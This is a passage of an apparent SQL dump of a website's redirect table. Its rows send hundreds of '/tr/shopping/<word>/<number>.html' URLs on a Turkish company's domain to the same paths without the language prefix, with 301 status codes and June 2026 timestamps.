00:00:00',301),(71597,'https://3s-technologies.com.tr/tr/shopping/deferment/3663214225.html',NULL,'https://3s-technologies.com.tr/shopping/deferment/3663214225.html','',1,0,'2026-06-11 03:43:35','0000-00-00 00:00:00',301),(71598,'https://3s-technologies.com.tr/tr/shopping/monology/30147165.html',NULL,'https://3s-technologies.com.tr/shopping/monology/30147165.html','',1,0,'2026-06-11 03:43:38','0000-00-00 00:00:00',301),(71599,'https://3s-technologies.com.tr/tr/shopping/biblicist/742432199.html',NULL,'https://3s-technologies.com.tr/shopping/biblicist/742432199.html','',1,0,'2026-06-11 03:43:41','0000-00-00 00:00:00',301),(71600,'https://3s-technologies.com.tr/tr/shopping/argenteus/446717193.html',NULL,'https://3s-technologies.com.tr/shopping/argenteus/446717193.html','',1,0,'2026-06-11 03:43:44','0000-00-00 00:00:00',301),(71601,'https://3s-technologies.com.tr/tr/shopping/rascally/3576207978.html',NULL,'https://3s-technologies.com.tr/shopping/rascally/3576207978.html','',1,0,'2026-06-11 03:43:49','0000-00-00 00:00:00',301),(71602,'https://3s-technologies.com.tr/tr/shopping/depainted/3025068537.html',NULL,'https://3s-technologies.com.tr/shopping/depainted/3025068537.html','',1,0,'2026-06-11 03:43:52','0000-00-00 00:00:00',301),(71603,'https://3s-technologies.com.tr/tr/shopping/caruncular/749445201.html',NULL,'https://3s-technologies.com.tr/shopping/caruncular/749445201.html','',1,0,'2026-06-11 03:43:55','0000-00-00 00:00:00',301),(71604,'https://3s-technologies.com.tr/tr/shopping/expeditate/247434893.html',NULL,'https://3s-technologies.com.tr/shopping/expeditate/247434893.html','',1,0,'2026-06-11 03:43:58','0000-00-00 00:00:00',301),(71605,'https://3s-technologies.com.tr/tr/shopping/debuscope/2208799925.html',NULL,'https://3s-technologies.com.tr/shopping/debuscope/2208799925.html','',1,0,'2026-06-11 03:44:01','0000-00-00 00:00:00',301),(71606,'https://3s-technologies.com.tr/tr/shopping/geometrized/1732291216.html',NULL,'https://3s-technologies.com.tr/shopping/geometrized/1732291216.html','',1,0,'2026-06-11 03:44:04','0000-00-00 00:00:00',301),(71607,'https://3s-technologies.com.tr/tr/shopping/foetor/157777221.html',NULL,'https://3s-technologies.com.tr/shopping/foetor/157777221.html','',1,0,'2026-06-11 03:44:07','0000-00-00 00:00:00',301),(71608,'https://3s-technologies.com.tr/tr/shopping/prenticeship/3235697163.html',NULL,'https://3s-technologies.com.tr/shopping/prenticeship/3235697163.html','',1,0,'2026-06-11 03:44:10','0000-00-00 00:00:00',301),(71609,'https://3s-technologies.com.tr/tr/shopping/emarginate/2438152884.html',NULL,'https://3s-technologies.com.tr/shopping/emarginate/2438152884.html','',1,0,'2026-06-11 03:44:13','0000-00-00 00:00:00',301),(71610,'https://3s-technologies.com.tr/tr/shopping/illampu/2753483619.html',NULL,'https://3s-technologies.com.tr/shopping/illampu/2753483619.html','',1,0,'2026-06-11 03:44:16','0000-00-00 00:00:00',301),(71611,'https://3s-technologies.com.tr/tr/shopping/apalachian/3902817175.html',NULL,'https://3s-technologies.com.tr/shopping/apalachian/3902817175.html','',1,0,'2026-06-11 03:44:19','0000-00-00 00:00:00',301),(71612,'https://3s-technologies.com.tr/tr/shopping/rejournment/299567477.html',NULL,'https://3s-technologies.com.tr/shopping/rejournment/299567477.html','',1,0,'2026-06-11 03:44:22','0000-00-00 00:00:00',301),(71613,'https://3s-technologies.com.tr/tr/shopping/opportunity/638121591.html',NULL,'https://3s-technologies.com.tr/shopping/opportunity/638121591.html','',1,0,'2026-06-11 03:44:25','0000-00-00 00:00:00',301),(71614,'https://3s-technologies.com.tr/tr/shopping/ruhmkorffs/588531304.html',NULL,'https://3s-technologies.com.tr/shopping/ruhmkorffs/588531304.html','',1,0,'2026-06-11 03:44:29','0000-00-00 00:00:00',301),(71615,'https://3s-technologies.com.tr/tr/shopping/trialogue/2535939540.html',NULL,'https://3s-technologies.com.tr/shopping/trialogue/2535939540.html','',1,0,'2026-06-11 03:44:32','0000-00-00 00:00:00',301),(71616,'https://3s-technologies.com.tr/tr/shopping/latitat/2070246691.html',NULL,'https://3s-technologies.com.tr/shopping/latitat/2070246691.html','',1,0,'2026-06-11 03:44:35','0000-00-00 00:00:00',301),(71617,'https://3s-technologies.com.tr/tr/shopping/abulic/1538722212.html',NULL,'https://3s-technologies.com.tr/shopping/abulic/1538722212.html','',1,0,'2026-06-11 03:44:38','0000-00-00 00:00:00',301),(71618,'https://3s-technologies.com.tr/tr/shopping/hydromechanics/985418181.html',NULL,'https://3s-technologies.com.tr/shopping/hydromechanics/985418181.html','',1,0,'2026-06-11 03:44:41','0000-00-00 00:00:00',301),(71619,'https://3s-technologies.com.tr/tr/shopping/vendue/2506915274.html',NULL,'https://3s-technologies.com.tr/shopping/vendue/2506915274.html','',1,0,'2026-06-11 03:44:44','0000-00-00 00:00:00',301),(71620,'https://3s-technologies.com.tr/tr/shopping/countercharmed/1118170545.html',NULL,'https://3s-technologies.com.tr/shopping/countercharmed/1118170545.html','',1,0,'2026-06-11 03:44:47','0000-00-00 00:00:00',301),(71621,'https://3s-technologies.com.tr/tr/shopping/atherina/2029226847.html',NULL,'https://3s-technologies.com.tr/shopping/atherina/2029226847.html','',1,0,'2026-06-11 03:44:50','0000-00-00 00:00:00',301),(71622,'https://3s-technologies.com.tr/tr/shopping/brownist/3029820864.html',NULL,'https://3s-technologies.com.tr/shopping/brownist/3029820864.html','',1,0,'2026-06-11 03:44:53','0000-00-00 00:00:00',301),(71623,'https://3s-technologies.com.tr/tr/shopping/kiosk/3827528634.html',NULL,'https://3s-technologies.com.tr/shopping/kiosk/3827528634.html','',1,0,'2026-06-11 03:44:56','0000-00-00 00:00:00',301),(71624,'https://3s-technologies.com.tr/tr/shopping/disapprover/2390609088.html',NULL,'https://3s-technologies.com.tr/shopping/disapprover/2390609088.html','',1,0,'2026-06-11 03:44:59','0000-00-00 00:00:00',301),(71625,'https://3s-technologies.com.tr/tr/shopping/varisse/3229896260.html',NULL,'https://3s-technologies.com.tr/shopping/varisse/3229896260.html','',1,0,'2026-06-11 03:45:02','0000-00-00 00:00:00',301),(71626,'https://3s-technologies.com.tr/tr/shopping/hopefully/1748859501.html',NULL,'https://3s-technologies.com.tr/shopping/hopefully/1748859501.html','',1,0,'2026-06-11 03:45:05','0000-00-00 00:00:00',301),(71627,'https://3s-technologies.com.tr/tr/shopping/passibleness/3525619357.html',NULL,'https://3s-technologies.com.tr/shopping/passibleness/3525619357.html','',1,0,'2026-06-11 03:45:09','0000-00-00 00:00:00',301),(71628,'https://3s-technologies.com.tr/tr/shopping/smilax/809755279.html',NULL,'https://3s-technologies.com.tr/shopping/smilax/809755279.html','',1,0,'2026-06-11 03:45:11','0000-00-00 00:00:00',301),(71629,'https://3s-technologies.com.tr/tr/shopping/escocheon/2597298210.html',NULL,'https://3s-technologies.com.tr/shopping/escocheon/2597298210.html','',1,0,'2026-06-11 03:45:14','0000-00-00 00:00:00',301),(71630,'https://3s-technologies.com.tr/tr/shopping/ornithomyia/1579790099.html',NULL,'https://3s-technologies.com.tr/shopping/ornithomyia/1579790099.html','',1,0,'2026-06-11 03:45:17','0000-00-00 00:00:00',301),(71631,'https://3s-technologies.com.tr/tr/shopping/factual/4047195168.html',NULL,'https://3s-technologies.com.tr/shopping/factual/4047195168.html','',1,0,'2026-06-11 03:45:25','0000-00-00 00:00:00',301),(71632,'https://3s-technologies.com.tr/tr/shopping/cacochymical/1653890412.html',NULL,'https://3s-technologies.com.tr/shopping/cacochymical/1653890412.html','',1,0,'2026-06-11 03:45:27','0000-00-00 00:00:00',301),(71633,'https://3s-technologies.com.tr/tr/shopping/jeers/714785754.html',NULL,'https://3s-technologies.com.tr/shopping/jeers/714785754.html','',1,0,'2026-06-11 03:45:30','0000-00-00 00:00:00',301),(71634,'https://3s-technologies.com.tr/tr/shopping/rendezvoused/3702625967.html',NULL,'https://3s-technologies.com.tr/shopping/rendezvoused/3702625967.html','',1,0,'2026-06-11 03:45:33','0000-00-00 00:00:00',301),(71635,'https://3s-technologies.com.tr/tr/shopping/ambrosial/3278092629.html',NULL,'https://3s-technologies.com.tr/shopping/ambrosial/3278092629.html','',1,0,'2026-06-11 03:45:36','0000-00-00 00:00:00',301),(71636,'https://3s-technologies.com.tr/tr/shopping/alveolar/1548099071.html',NULL,'https://3s-technologies.com.tr/shopping/alveolar/1548099071.html','',1,0,'2026-06-11 03:45:39','0000-00-00 00:00:00',301),(71637,'https://3s-technologies.com.tr/tr/shopping/pilei/2176811582.html',NULL,'https://3s-technologies.com.tr/shopping/pilei/2176811582.html','',1,0,'2026-06-11 03:45:42','0000-00-00 00:00:00',301),(71638,'https://3s-technologies.com.tr/tr/shopping/wordy/3662657286.html',NULL,'https://3s-technologies.com.tr/shopping/wordy/3662657286.html','',1,0,'2026-06-11 03:45:45','0000-00-00 00:00:00',301),(71639,'https://3s-technologies.com.tr/tr/shopping/benzoate/3649235844.html',NULL,'https://3s-technologies.com.tr/shopping/benzoate/3649235844.html','',1,0,'2026-06-11 03:45:48','0000-00-00 00:00:00',301),(71640,'https://3s-technologies.com.tr/tr/shopping/missay/668799383.html',NULL,'https://3s-technologies.com.tr/shopping/missay/668799383.html','',1,0,'2026-06-11 03:45:51','0000-00-00 00:00:00',301),(71641,'https://3s-technologies.com.tr/tr/shopping/alkalescence/3178787629.html',NULL,'https://3s-technologies.com.tr/shopping/alkalescence/3178787629.html','',1,0,'2026-06-11 03:45:54','0000-00-00 00:00:00',301),(71642,'https://3s-technologies.com.tr/tr/shopping/tamaric/3853617638.html',NULL,'https://3s-technologies.com.tr/shopping/tamaric/3853617638.html','',1,0,'2026-06-11 03:45:57','0000-00-00 00:00:00',301),(71643,'https://3s-technologies.com.tr/tr/shopping/unloose/3695449458.html',NULL,'https://3s-technologies.com.tr/shopping/unloose/3695449458.html','',1,0,'2026-06-11 03:46:05','0000-00-00 00:00:00',301),(71644,'https://3s-technologies.com.tr/tr/shopping/factorage/587319205.html',NULL,'https://3s-technologies.com.tr/shopping/factorage/587319205.html','',1,0,'2026-06-11 03:46:09','0000-00-00 00:00:00',301),(71645,'https://3s-technologies.com.tr/tr/shopping/palfreyed/354976099.html',NULL,'https://3s-technologies.com.tr/shopping/palfreyed/354976099.html','',1,0,'2026-06-11 03:46:12','0000-00-00 00:00:00',301),(71646,'https://3s-technologies.com.tr/tr/shopping/sabotage/3851848616.html',NULL,'https://3s-technologies.com.tr/shopping/sabotage/3851848616.html','',1,0,'2026-06-11 03:46:15','0000-00-00 00:00:00',301),(71647,'https://3s-technologies.com.tr/tr/shopping/revealment/900430481.html',NULL,'https://3s-technologies.com.tr/shopping/revealment/900430481.html','',1,0,'2026-06-11 03:46:18','0000-00-00 00:00:00',301),(71648,'https://3s-technologies.com.tr/tr/shopping/chabasie/3068119211.html',NULL,'https://3s-technologies.com.tr/shopping/chabasie/3068119211.html','',1,0,'2026-06-11 03:46:21','0000-00-00 00:00:00',301),(71649,'https://3s-technologies.com.tr/tr/shopping/rubicundus/1390574162.html',NULL,'https://3s-technologies.com.tr/shopping/rubicundus/1390574162.html','',1,0,'2026-06-11 03:46:24','0000-00-00 00:00:00',301),(71650,'https://3s-technologies.com.tr/tr/shopping/burgout/554118763.html',NULL,'https://3s-technologies.com.tr/shopping/burgout/554118763.html','',1,0,'2026-06-11 03:46:27','0000-00-00 00:00:00',301),(71651,'https://3s-technologies.com.tr/tr/shopping/bechuanas/273478473.html',NULL,'https://3s-technologies.com.tr/shopping/bechuanas/273478473.html','',1,0,'2026-06-11 03:46:30','0000-00-00 00:00:00',301),(71652,'https://3s-technologies.com.tr/tr/shopping/citylike/4165879709.html',NULL,'https://3s-technologies.com.tr/shopping/citylike/4165879709.html','',1,0,'2026-06-11 03:46:33','0000-00-00 00:00:00',301),(71653,'https://3s-technologies.com.tr/tr/shopping/chrysomela/3357362809.html',NULL,'https://3s-technologies.com.tr/shopping/chrysomela/3357362809.html','',1,0,'2026-06-11 03:46:36','0000-00-00 00:00:00',301),(71654,'https://3s-technologies.com.tr/tr/shopping/rhatany/1119382628.html',NULL,'https://3s-technologies.com.tr/shopping/rhatany/1119382628.html','',1,0,'2026-06-11 03:46:39','0000-00-00 00:00:00',301),(71655,'https://3s-technologies.com.tr/tr/shopping/hummed/2456326653.html',NULL,'https://3s-technologies.com.tr/shopping/hummed/2456326653.html','',1,0,'2026-06-11 03:46:42','0000-00-00 00:00:00',301),(71656,'https://3s-technologies.com.tr/tr/shopping/moschatel/2137806385.html',NULL,'https://3s-technologies.com.tr/shopping/moschatel/2137806385.html','',1,0,'2026-06-11 03:46:50','0000-00-00 00:00:00',301),(71657,'https://3s-technologies.com.tr/tr/shopping/modulate/2484375885.html',NULL,'https://3s-technologies.com.tr/shopping/modulate/2484375885.html','',1,0,'2026-06-11 03:46:53','0000-00-00 00:00:00',301),(71658,'https://3s-technologies.com.tr/tr/shopping/fixed/1996968620.html',NULL,'https://3s-technologies.com.tr/shopping/fixed/1996968620.html','',1,0,'2026-06-11 03:46:57','0000-00-00 00:00:00',301),(71659,'https://3s-technologies.com.tr/tr/shopping/squaller/38412167.html',NULL,'https://3s-technologies.com.tr/shopping/squaller/38412167.html','',1,0,'2026-06-11 03:46:59','0000-00-00 00:00:00',301),(71660,'https://3s-technologies.com.tr/tr/shopping/interpoint/1503984599.html',NULL,'https://3s-technologies.com.tr/shopping/interpoint/1503984599.html','',1,0,'2026-06-11 03:47:02','0000-00-00 00:00:00',301),(71661,'https://3s-technologies.com.tr/tr/shopping/pollutingly/4241481253.html',NULL,'https://3s-technologies.com.tr/shopping/pollutingly/4241481253.html','',1,0,'2026-06-11 03:47:05','0000-00-00 00:00:00',301),(71662,'https://3s-technologies.com.tr/tr/shopping/basify/2762353587.html',NULL,'https://3s-technologies.com.tr/shopping/basify/2762353587.html','',1,0,'2026-06-11 03:47:08','0000-00-00 00:00:00',301),(71663,'https://3s-technologies.com.tr/tr/shopping/decimalization/2164249240.html',NULL,'https://3s-technologies.com.tr/shopping/decimalization/2164249240.html','',1,0,'2026-06-11 03:47:11','0000-00-00 00:00:00',301),(71664,'https://3s-technologies.com.tr/tr/shopping/pitiably/2563772680.html',NULL,'https://3s-technologies.com.tr/shopping/pitiably/2563772680.html','',1,0,'2026-06-11 03:47:14','0000-00-00 00:00:00',301),(71665,'https://3s-technologies.com.tr/tr/shopping/egranulose/2708251459.html',NULL,'https://3s-technologies.com.tr/shopping/egranulose/2708251459.html','',1,0,'2026-06-11 03:47:24','0000-00-00 00:00:00',301),(71666,'https://3s-technologies.com.tr/tr/shopping/tristfully/3142685438.html',NULL,'https://3s-technologies.com.tr/shopping/tristfully/3142685438.html','',1,0,'2026-06-11 03:47:26','0000-00-00 00:00:00',301),(71667,'https://3s-technologies.com.tr/tr/shopping/semimonthly/1283202067.html',NULL,'https://3s-technologies.com.tr/shopping/semimonthly/1283202067.html','',1,0,'2026-06-11 03:47:33','0000-00-00 00:00:00',301),(71668,'https://3s-technologies.com.tr/tr/shopping/grayness/659467671.html',NULL,'https://3s-technologies.com.tr/shopping/grayness/659467671.html','',1,0,'2026-06-11 03:47:36','0000-00-00 00:00:00',301),(71669,'https://3s-technologies.com.tr/tr/shopping/improbability/3774407538.html',NULL,'https://3s-technologies.com.tr/shopping/improbability/3774407538.html','',1,0,'2026-06-11 03:47:38','0000-00-00 00:00:00',301),(71670,'https://3s-technologies.com.tr/tr/shopping/overcloud/169340775.html',NULL,'https://3s-technologies.com.tr/shopping/overcloud/169340775.html','',1,0,'2026-06-11 03:47:42','0000-00-00 00:00:00',301),(71671,'https://3s-technologies.com.tr/tr/shopping/trace/306542243.html',NULL,'https://3s-technologies.com.tr/shopping/trace/306542243.html','',1,0,'2026-06-11 03:47:45','0000-00-00 00:00:00',301),(71672,'https://3s-technologies.com.tr/tr/shopping/bracteolate/642239264.html',NULL,'https://3s-technologies.com.tr/shopping/bracteolate/642239264.html','',1,0,'2026-06-11 03:47:48','0000-00-00 00:00:00',301),(71673,'https://3s-technologies.com.tr/tr/shopping/lightlegged/3321458505.html',NULL,'https://3s-technologies.com.tr/shopping/lightlegged/3321458505.html','',1,0,'2026-06-11 03:47:51','0000-00-00 00:00:00',301),(71674,'https://3s-technologies.com.tr/tr/shopping/concurrentness/898893326.html',NULL,'https://3s-technologies.com.tr/shopping/concurrentness/898893326.html','',1,0,'2026-06-11 03:47:54','0000-00-00 00:00:00',301),(71675,'https://3s-technologies.com.tr/tr/shopping/knowledgeably/4008183563.html',NULL,'https://3s-technologies.com.tr/shopping/knowledgeably/4008183563.html','',1,0,'2026-06-11 03:47:57','0000-00-00 00:00:00',301),(71676,'https://3s-technologies.com.tr/tr/shopping/archly/511063705.html',NULL,'https://3s-technologies.com.tr/shopping/archly/511063705.html','',1,0,'2026-06-11 03:48:02','0000-00-00 00:00:00',301),(71677,'https://3s-technologies.com.tr/tr/shopping/cluttered/2744922579.html',NULL,'https://3s-technologies.com.tr/shopping/cluttered/2744922579.html','',1,0,'2026-06-11 03:48:05','0000-00-00 00:00:00',301),(71678,'https://3s-technologies.com.tr/tr/shopping/repaying/1971484550.html',NULL,'https://3s-technologies.com.tr/shopping/repaying/1971484550.html','',1,0,'2026-06-11 03:48:08','0000-00-00 00:00:00',301),(71679,'https://3s-technologies.com.tr/tr/shopping/devastator/4107741844.html',NULL,'https://3s-technologies.com.tr/shopping/devastator/4107741844.html','',1,0,'2026-06-11 03:48:11','0000-00-00 00:00:00',301),(71680,'https://3s-technologies.com.tr/tr/shopping/inducer/1920336822.html',NULL,'https://3s-technologies.com.tr/shopping/inducer/1920336822.html','',1,0,'2026-06-11 03:48:14','0000-00-00 00:00:00',301),(71681,'https://3s-technologies.com.tr/tr/shopping/revendicated/143856737.html',NULL,'https://3s-technologies.com.tr/shopping/revendicated/143856737.html','',1,0,'2026-06-11 03:48:17','0000-00-00 00:00:00',301),(71682,'https://3s-technologies.com.tr/tr/shopping/initially/1652128609.html',NULL,'https://3s-technologies.com.tr/shopping/initially/1652128609.html','',1,0,'2026-06-11 03:48:20','0000-00-00 00:00:00',301),(71683,'https://3s-technologies.com.tr/tr/shopping/polyp/2467676442.html',NULL,'https://3s-technologies.com.tr/shopping/polyp/2467676442.html','',1,0,'2026-06-11 03:48:23','0000-00-00 00:00:00',301),(71684,'https://3s-technologies.com.tr/tr/shopping/indigestedness/878768732.html',NULL,'https://3s-technologies.com.tr/shopping/indigestedness/878768732.html','',1,0,'2026-06-11 03:48:26','0000-00-00 00:00:00',301),(71685,'https://3s-technologies.com.tr/tr/shopping/cornering/1085857114.html',NULL,'https://3s-technologies.com.tr/shopping/cornering/1085857114.html','',1,0,'2026-06-11 03:48:32','0000-00-00 00:00:00',301),(71686,'https://3s-technologies.com.tr/tr/shopping/kasack/2139096637.html',NULL,'https://3s-technologies.com.tr/shopping/kasack/2139096637.html','',1,0,'2026-06-11 03:48:34','0000-00-00 00:00:00',301),(71687,'https://3s-technologies.com.tr/tr/shopping/optimism/100294548.html',NULL,'https://3s-technologies.com.tr/shopping/optimism/100294548.html','',1,0,'2026-06-11 03:48:37','0000-00-00 00:00:00',301),(71688,'https://3s-technologies.com.tr/tr/shopping/materialization/706666157.html',NULL,'https://3s-technologies.com.tr/shopping/materialization/706666157.html','',1,0,'2026-06-11 03:48:40','0000-00-00 00:00:00',301),(71689,'https://3s-technologies.com.tr/tr/shopping/injoin/740113489.html',NULL,'https://3s-technologies.com.tr/shopping/injoin/740113489.html','',1,0,'2026-06-11 03:48:43','0000-00-00 00:00:00',301),(71690,'https://3s-technologies.com.tr/tr/shopping/monographically/1050553677.html',NULL,'https://3s-technologies.com.tr/shopping/monographically/1050553677.html','',1,0,'2026-06-11 03:48:46','0000-00-00 00:00:00',301),(71691,'https://3s-technologies.com.tr/tr/shopping/captived/3575005282.html',NULL,'https://3s-technologies.com.tr/shopping/captived/3575005282.html','',1,0,'2026-06-11 03:48:49','0000-00-00 00:00:00',301),(71692,'https://3s-technologies.com.tr/tr/shopping/interchangeability/2907520532.html',NULL,'https://3s-technologies.com.tr/shopping/interchangeability/2907520532.html','',1,0,'2026-06-11 03:48:52','0000-00-00 00:00:00',301),(71693,'https://3s-technologies.com.tr/tr/shopping/nobleness/2018683036.html',NULL,'https://3s-technologies.com.tr/shopping/nobleness/2018683036.html','',1,0,'2026-06-11 03:48:55','0000-00-00 00:00:00',301),(71694,'https://3s-technologies.com.tr/tr/shopping/diligent/268899088.html',NULL,'https://3s-technologies.com.tr/shopping/diligent/268899088.html','',1,0,'2026-06-11 03:49:01','0000-00-00 00:00:00',301),(71695,'https://3s-technologies.com.tr/tr/shopping/precel/2348513147.html',NULL,'https://3s-technologies.com.tr/shopping/precel/2348513147.html','',1,0,'2026-06-11 03:49:03','0000-00-00 00:00:00',301),(71696,'https://3s-technologies.com.tr/tr/shopping/treasuring/3413053524.html',NULL,'https://3s-technologies.com.tr/shopping/treasuring/3413053524.html','',1,0,'2026-06-11 03:49:07','0000-00-00 00:00:00',301),(71697,'https://3s-technologies.com.tr/tr/shopping/window/2518478844.html',NULL,'https://3s-technologies.com.tr/shopping/window/2518478844.html','',1,0,'2026-06-11 03:49:09','0000-00-00 00:00:00',301),(71698,'https://3s-technologies.com.tr/tr/shopping/flammability/4032140722.html',NULL,'https://3s-technologies.com.tr/shopping/flammability/4032140722.html','',1,0,'2026-06-11 03:49:12','0000-00-00 00:00:00',301),(71699,'https://3s-technologies.com.tr/tr/shopping/unnumerable/1869839816.html',NULL,'https://3s-technologies.com.tr/shopping/unnumerable/1869839816.html','',1,0,'2026-06-11 03:49:16','0000-00-00 00:00:00',301),(71700,'https://3s-technologies.com.tr/tr/shopping/fruity/2456892947.html',NULL,'https://3s-technologies.com.tr/shopping/fruity/2456892947.html','',1,0,'2026-06-11 03:49:19','0000-00-00 00:00:00',301),(71701,'https://3s-technologies.com.tr/tr/shopping/shuttle/3074958381.html',NULL,'https://3s-technologies.com.tr/shopping/shuttle/3074958381.html','',1,0,'2026-06-11 03:49:24','0000-00-00 00:00:00',301),(71702,'https://3s-technologies.com.tr/tr/shopping/fructified/1726595785.html',NULL,'https://3s-technologies.com.tr/shopping/fructified/1726595785.html','',1,0,'2026-06-11 03:49:26','0000-00-00 00:00:00',301),(71703,'https://3s-technologies.com.tr/tr/shopping/familiarization/168128676.html',NULL,'https://3s-technologies.com.tr/shopping/familiarization/168128676.html','',1,0,'2026-06-11 03:49:29','0000-00-00 00:00:00',301),(71704,'https://3s-technologies.com.tr/tr/shopping/doubtance/3958593276.html',NULL,'https://3s-technologies.com.tr/shopping/doubtance/3958593276.html','',1,0,'2026-06-11 03:49:32','0000-00-00 00:00:00',301),(71705,'https://3s-technologies.com.tr/tr/shopping/eviternity/7867352.html',NULL,'https://3s-technologies.com.tr/shopping/eviternity/7867352.html','',1,0,'2026-06-11 03:49:35','0000-00-00 00:00:00',301),(71706,'https://3s-technologies.com.tr/tr/shopping/impunctual/2196169693.html',NULL,'https://3s-technologies.com.tr/shopping/impunctual/2196169693.html','',1,0,'2026-06-11 03:49:38','0000-00-00 00:00:00',301),(71707,'https://3s-technologies.com.tr/tr/shopping/rivalry/464850123.html',NULL,'https://3s-technologies.com.tr/shopping/rivalry/464850123.html','',1,0,'2026-06-11 03:49:41','0000-00-00 00:00:00',301),(71708,'https://3s-technologies.com.tr/tr/shopping/ataractic/2648878440.html',NULL,'https://3s-technologies.com.tr/shopping/ataractic/2648878440.html','',1,0,'2026-06-11 03:49:44','0000-00-00 00:00:00',301),(71709,'https://3s-technologies.com.tr/tr/shopping/spraining/3289405091.html',NULL,'https://3s-technologies.com.tr/shopping/spraining/3289405091.html','',1,0,'2026-06-11 03:49:47','0000-00-00 00:00:00',301),(71710,'https://3s-technologies.com.tr/tr/shopping/floret/4083635627.html',NULL,'https://3s-technologies.com.tr/shopping/floret/4083635627.html','',1,0,'2026-06-11 03:49:58','0000-00-00 00:00:00',301),(71711,'https://3s-technologies.com.tr/tr/shopping/trigonometry/1009533801.html',NULL,'https://3s-technologies.com.tr/shopping/trigonometry/1009533801.html','',1,0,'2026-06-11 03:50:02','0000-00-00 00:00:00',301),(71712,'https://3s-technologies.com.tr/tr/shopping/betterlooking/1922501412.html',NULL,'https://3s-technologies.com.tr/shopping/betterlooking/1922501412.html','',1,0,'2026-06-11 03:50:05','0000-00-00 00:00:00',301),(71713,'https://3s-technologies.com.tr/tr/shopping/intentiveness/2355793306.html',NULL,'https://3s-technologies.com.tr/shopping/intentiveness/2355793306.html','',1,0,'2026-06-11 03:50:08','0000-00-00 00:00:00',301),(71714,'https://3s-technologies.com.tr/tr/shopping/backbiter/1019346873.html',NULL,'https://3s-technologies.com.tr/shopping/backbiter/1019346873.html','',1,0,'2026-06-11 03:50:11','0000-00-00 00:00:00',301),(71715,'https://3s-technologies.com.tr/tr/shopping/dovers/495700347.html',NULL,'https://3s-technologies.com.tr/shopping/dovers/495700347.html','',1,0,'2026-06-11 03:50:14','0000-00-00 00:00:00',301),(71716,'https://3s-technologies.com.tr/tr/shopping/jowler/1984328969.html',NULL,'https://3s-technologies.com.tr/shopping/jowler/1984328969.html','',1,0,'2026-06-11 03:50:17','0000-00-00 00:00:00',301),(71717,'https://3s-technologies.com.tr/tr/shopping/emplecton/82334560.html',NULL,'https://3s-technologies.com.tr/shopping/emplecton/82334560.html','',1,0,'2026-06-11 03:50:20','0000-00-00 00:00:00',301),(71718,'https://3s-technologies.com.tr/tr/shopping/benzoinated/2425280976.html',NULL,'https://3s-technologies.com.tr/shopping/benzoinated/2425280976.html','',1,0,'2026-06-11 03:50:28','0000-00-00 00:00:00',301),(71719,'https://3s-technologies.com.tr/tr/shopping/disprofitable/919625069.html',NULL,'https://3s-technologies.com.tr/shopping/disprofitable/919625069.html','',1,0,'2026-06-11 03:50:31','0000-00-00 00:00:00',301),(71720,'https://3s-technologies.com.tr/tr/shopping/dressing/2271848968.html',NULL,'https://3s-technologies.com.tr/shopping/dressing/2271848968.html','',1,0,'2026-06-11 03:50:34','0000-00-00 00:00:00',301),(71721,'https://3s-technologies.com.tr/tr/shopping/squeaky/2117681791.html',NULL,'https://3s-technologies.com.tr/shopping/squeaky/2117681791.html','',1,0,'2026-06-11 03:50:38','0000-00-00 00:00:00',301),(71722,'https://3s-technologies.com.tr/tr/shopping/restringing/2104915509.html',NULL,'https://3s-technologies.com.tr/shopping/restringing/2104915509.html','',1,0,'2026-06-11 03:50:41','0000-00-00 00:00:00',301),(71723,'https://3s-technologies.com.tr/tr/shopping/goodden/213909363.html',NULL,'https://3s-technologies.com.tr/shopping/goodden/213909363.html','',1,0,'2026-06-11 03:50:43','0000-00-00 00:00:00',301),(71724,'https://3s-technologies.com.tr/tr/shopping/assigned/2352494786.html',NULL,'https://3s-technologies.com.tr/shopping/assigned/2352494786.html','',1,0,'2026-06-11 03:50:46','0000-00-00 00:00:00',301),(71725,'https://3s-technologies.com.tr/tr/shopping/crashing/195429779.html',NULL,'https://3s-technologies.com.tr/shopping/crashing/195429779.html','',1,0,'2026-06-11 03:50:49','0000-00-00 00:00:00',301),(71726,'https://3s-technologies.com.tr/tr/shopping/frouncing/191889583.html',NULL,'https://3s-technologies.com.tr/shopping/frouncing/191889583.html','',1,0,'2026-06-11 03:50:52','0000-00-00 00:00:00',301),(71727,'https://3s-technologies.com.tr/tr/shopping/ameboid/3443124167.html',NULL,'https://3s-technologies.com.tr/shopping/ameboid/3443124167.html','',1,0,'2026-06-11 03:50:57','0000-00-00 00:00:00',301),(71728,'https://3s-technologies.com.tr/tr/shopping/roughcast/2948222571.html',NULL,'https://3s-technologies.com.tr/shopping/roughcast/2948222571.html','',1,0,'2026-06-11 03:51:00','0000-00-00 00:00:00',301),(71729,'https://3s-technologies.com.tr/tr/shopping/underrun/1965857917.html',NULL,'https://3s-technologies.com.tr/shopping/underrun/1965857917.html','',1,0,'2026-06-11 03:51:03','0000-00-00 00:00:00',301),(71730,'https://3s-technologies.com.tr/tr/shopping/unavoidableness/1740516301.html',NULL,'https://3s-technologies.com.tr/shopping/unavoidableness/1740516301.html','',1,0,'2026-06-11 03:51:06','0000-00-00 00:00:00',301),(71731,'https://3s-technologies.com.tr/tr/shopping/stridden/2830311305.html',NULL,'https://3s-technologies.com.tr/shopping/stridden/2830311305.html','',1,0,'2026-06-11 03:51:09','0000-00-00 00:00:00',301),(71732,'https://3s-technologies.com.tr/tr/shopping/indigometer/4228195423.html',NULL,'https://3s-technologies.com.tr/shopping/indigometer/4228195423.html','',1,0,'2026-06-11 03:51:12','0000-00-00 00:00:00',301),(71733,'https://3s-technologies.com.tr/tr/shopping/insuring/1223539116.html',NULL,'https://3s-technologies.com.tr/shopping/insuring/1223539116.html','',1,0,'2026-06-11 03:51:15','0000-00-00 00:00:00',301),(71734,'https://3s-technologies.com.tr/tr/shopping/multiferous/681260256.html',NULL,'https://3s-technologies.com.tr/shopping/multiferous/681260256.html','',1,0,'2026-06-11 03:51:18','0000-00-00 00:00:00',301),(71735,'https://3s-technologies.com.tr/tr/shopping/corium/2846905090.html',NULL,'https://3s-technologies.com.tr/shopping/corium/2846905090.html','',1,0,'2026-06-11 03:51:27','0000-00-00 00:00:00',301),(71736,'https://3s-technologies.com.tr/tr/shopping/prinus/3063933194.html',NULL,'https://3s-technologies.com.tr/shopping/prinus/3063933194.html','',1,0,'2026-06-11 03:51:30','0000-00-00 00:00:00',301),(71737,'https://3s-technologies.com.tr/tr/shopping/relating/1049341562.html',NULL,'https://3s-technologies.com.tr/shopping/relating/1049341562.html','',1,0,'2026-06-11 03:51:32','0000-00-00 